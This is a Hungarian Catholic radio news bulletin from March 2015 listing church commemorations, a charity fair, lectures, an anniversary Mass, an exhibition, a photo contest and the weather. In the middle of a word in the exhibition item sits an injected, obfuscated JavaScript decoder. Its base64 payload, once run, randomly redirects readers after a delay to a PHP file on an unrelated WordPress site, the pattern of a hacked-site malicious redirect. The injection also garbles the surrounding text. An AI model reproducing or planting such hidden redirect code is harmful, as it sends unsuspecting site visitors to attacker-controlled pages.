2015. március 24. – Hírek és programajánló

H Í R E K   R E G G E L / D É L B E N

A 75 éve elhunyt Mailáth püspökre emlékeztek
A csíkszeredai Segítő Mária Gimnázium növendékei tegnap emlékeztek meg a gimnázium alapítójáról és pártfogójáról. A kápolnában felolvasták dr. Csipak Lajos kanonok, főgimnázium régens 1940-ben Mailáth püspök halálakor írt megemlékezését. Utána Tamás József püspök szentmisét mutatott be. A Főgimnázium folyosóján megkoszorúzták Mailáth püspök szobrát, valamint a gimnázium épülete előtt álló mellszobrot. Ezzel is kifejezték tiszteletüket a nagy püspök iránt.

Tavaszi Jótékonysági Vásár Nagyváradon
A Caritas Catolica társszervezésében idén is megtartják a Tavaszi Jótékonysági Vásárt, melynek keretében kézzel készített ajándéktárgyakat vásárolhatnak az érdeklődők, a vásár bevételét pedig az Élet Autizmussal Egyesület, a Hit és Fény Alapítvány, valamint a Caritas Catolica által megsegített fogyatékkal élő fiatalok támogatására fordítják.
A vásár a következő helyszíneken zajlik ezen a héten naponta délelőtt 9-13 óra között: a mai napon a Szent László Teológiai Líceumban, holnap a Mihai Eminescu Főgimnáziumban, csütörtökön a Partiumi Keresztény Egyetemen és pénteken a Szacsvay Imre Általános Iskolában.

Előadás Szászrégenben
A Rákóczi Szövetség és a szászrégeni plébánia szervezésében, Megmaradni címmel nagyböjti beszélgetésre hívják ma délben egy órakor a helyi és környékbeli IX-XII. osztályos magyar diákokat a Petru Maior Iskolaközpont dísztermében. Az előadás meghívottja Gödri István feketehalmi plébános lesz.

Mária köszöntő az esztelneki ferencrendi templomban
Az 500 éves Csíksomlyói Segítő Szűzanya kegyszobrának másolata Esztelnekre látogat, a 265 éves Esztelneki Madonna szülőföldjére. Ma délután négy órától hívnak és várnak minden Mária tisztelőt – különösen Háromszék településeiről – közös imádságra a kegyszobor másolata előtt, szülőföldünkért és egész nemzetünkért. Este hat órától szentmisét mutat be Urbán Erik atya, a csíksomlyói kegytemplom igazgatója. Szentmise után rózsafüzért imádkoznak és gyertyás körmenetet tartanak. Az esztelneki Mária köszöntőt rádiónk közvetíti.

Találkozás a szerzetesekkel Kolozsváron
A Megszentelt Élet Évében ma este nyolc órától a Kolozsvári Katolikus Egyetemi Lelkészség első emeleti termében Bereczki Silvia segítő nővér Tisztítótűz – mi közünk nekünk hozzád? címmel tart előadást.

Élet Napja Gyümölcsoltó Boldogasszony ünnepén
A Pro Vita Hominis életvédő társaság kilenceddel készül a Gyümölcsoltó Boldogasszony búcsúra, imádkozva „Akit Te Szent Szűz a szentlélektől fogantál” rózsafüzér tizedet. Az ünnepi búcsús szentmise Árkoson, az Irgalmasság anyja Kismamaotthon kápolnájában holnap fél négy órakor kezdődik, szónoka Urbán Erik ferences atya, a csíksomlyói kegytemplom igazgatója. Az Élet Napjának megünneplése a sepsiszentgyörgyi kórház udvarán folytatódik az Anyaság védelméért nevet viselő szobornál pro-life programmal és engesztelő imával a sok millió meg nem született életért.

Kilenc évesek lettünk
2006-ban, Gyümölcsoltó Boldogasszony ünnepén szólalt meg először hivatalosan a Mária Rádió. Ezt az évfordulót szerdán a tizenöt órától kezdődő, közvetített szentmisével illetve egész napos, rendhagyó programmal ünnepeljük. Az ünnepi szentmise főcelebránsa Fodor József vikárius lesz. Kérjük a hallgatókat, töltsék velünk a szerdai napot is!
Az együtt megélt kilenc évért március 28-án, szombaton adunk hálát Kolozsváron. Az ünnepi szentmise a Szent Mihály templomban déli tizenkét órakor kezdődik. Hívjuk és várjuk hallgatóinkat ünnepeljünk együtt Kolozsváron. Stúdióink területéről autóbuszok indulnak. Érdeklődni és jelentkezni az irodai telefonszámokon lehetséges.

Egyházművészeti Kiállítás nyílik Nagyváradon
A székesegyházban 1992 óta működő, állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó Egyházművészeti Gyűjteménye az idei év első hónapjaiban nagyszabású átalakítási munkálatokon esett át. A megújult, gazdagabb, látványosabb és tematikusan is jobban tagolt Egyházművészeti Kiállítás ünnepélyes megnyitójára március 26-án, csütörtökön este hat órakor kerül sor. A megnyitót követően a gyűjtemény hétfőtől szombatig reggel nyolc és délután öt között lesz látogatható. Az érdeklődők magyar, román, angol, olasz nyelveken igényelhetnek tárlatvezetést az Egyházmegyei Vallásturisztikai Iroda munkatársaitól.

Fotópályázatot hirdet a Szent Ferenc Alapítvány
A csíksomlyói Mária kegyszobor 500 éves tiszteletére a Szent Ferenc Alapítvány pályázatot hirdet amatőr és profi fotósoknak, akiktől a kegyszoborról, a csíksomlyói templomról, a pünkösdi búcsúról, illetve Csíksomlyóhoz, Máriához köthető eseményekről készült alkotásokat várnak. A legjobbnak ítélt 5 fénykép 100-100 euró díjban részesül. A beküldött fényképeket egy kiállításon lehet majd tekinteni Csíksomlyón. A Mária évben egy ünnepi albumot is szeretnének kiadni A pályamunkákat digitális formában várják húsvétig az eva.nagyfalusi@hotmail.com email címre.

Az időjárásról: Ma is marad a tavaszias időjárás több órás napsütéssel, amit inkább csak északon és az erdélyi medencében zavarhat meg egy-egy felhő. Csapadék sehol sem várható. A hajnali -6, +3 fokot követően délutánra a többfelé szeles időben 11 és 18 fok közé emelkedik a hőmérséklet. A héten egyre melegebbé válnak a nappalok, csütörtökön elérhetik akár a 20-23ºC -t is.

MRE - Hírszolgálat, 2015. március 24.

 

About the author

maradmin

Leave a Comment